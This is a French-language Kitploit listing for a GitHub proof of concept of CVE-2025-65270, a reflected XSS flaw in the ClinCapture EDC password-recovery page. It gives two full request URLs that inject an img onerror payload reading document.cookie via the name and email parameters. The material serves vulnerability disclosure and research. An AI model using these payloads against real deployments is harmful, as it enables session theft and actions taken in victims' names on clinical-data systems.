Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-65270 — XSS réfléchi dans ClinCapture EDC | Kitploit
Outils/GitHubGitHub/xh4vm/cve-2025-65270
Analyse des VulnérabilitésExploitation d'Applications WebSécurité WebTests d'IntrusionApprentissage et Éducation
GitHubxh4vm/cve-2025-65270

CVE-2025-65270

XSS réfléchi dans ClinCapture EDC

Voir le dépôt
1il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-65270

⚠️ Avertissement

Ce dépôt est uniquement destiné à la recherche en sécurité éducative et défensive

🔥 Vue d'ensemble

Vulnérabilité de cross-site scripting réfléchi (XSS) dans ClinCapture EDC 3.0 et 2.2.3, permettant à un attaquant distant non authentifié d'exécuter du code JavaScript dans le contexte du navigateur de la victime.

poc_xss

🧪 Preuve de concept

Pour démontrer la vulnérabilité, vous devez vous rendre dans l'onglet de récupération de mot de passe et spécifier la charge utile dans le paramètre name ou email, ou envoyer une seule requête

🔓 Via le paramètre name

root@kitploit:~
<url>/edc/RequestPassword?action=submit&name=text%22%3E%3Cimg%20src%3dx%20onerror%3dalert(document.cookie)%3E&[email protected]&passwdChallengeQuestion=favorite_animal&passwdChallengeAnswer=&Submit=Submit

poc_xss_1

🔓 Via le paramètre email

Télécharger l’outil
root@kitploit:~
<url>/edc/RequestPassword?action=submit&name=text&[email protected]%22%3E%3Cimg%20src%3dx%20onerror%3dalert(document.cookie)%3E&passwdChallengeQuestion=favorite_animal&passwdChallengeAnswer=&Submit=Submit

poc_xss_2

🚨 Impact

Un utilisateur non authentifié peut exécuter du code JavaScript dans le contexte du navigateur de la victime, visant à effectuer des actions au nom de la victime ou à voler des informations confidentielles, comme la réponse à une question de sécurité

🔗 Références

  • CVE-2025-65270